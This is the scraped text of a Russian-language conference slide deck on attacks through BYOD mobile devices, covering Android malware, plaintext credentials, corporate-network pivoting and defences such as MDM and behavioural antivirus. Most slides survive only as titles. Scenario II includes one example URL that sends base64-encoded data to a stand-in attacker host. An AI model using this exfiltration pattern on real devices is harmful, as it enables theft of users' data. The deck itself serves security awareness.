ݺߣ

ݺߣShare a Scribd company logo
Варианты реализации атак через мобильные устройства
Развитие атак на мобильных
устройствах
Артем Чайкин
Обо мне
- Руководитель отдела безопасности мобильных приложений
- SCADA Strangelove
Вводные
― BYOD
― Android (rooted / non-rooted)
― Установлено вредоносное ПО
― Устройство подключено к корпоративной сети
Сценарий I
Сценарий I
― Всё плохо
― Логин-пароль хранятся в открытом тексте
Сценарий I – Что делать?
Сценарий II
Сценарий II
Сценарий II
Сценарий II
Сценарий II
Сценарий II
Сценарий II
Сценарий II
http://attacker.com/?data=base64_encoded_data
Сценарий II
Сценарий II
Сценарий II – Что делать?
― MDM. Установка приложений из официального магазина
― Антивирусы. Поведенческий анализ
― Прецедентов не зарегистрировано. Пока
Сценарий II
Сценарий II
Развитие атаки на сеть
Развитие атаки на сеть
Развитие атаки на сеть
Развитие атаки на сеть
Конец рассказа
Спасибо за внимание
Артем Чайкин
Варианты реализации атак через мобильные устройства

More Related Content

Варианты реализации атак через мобильные устройства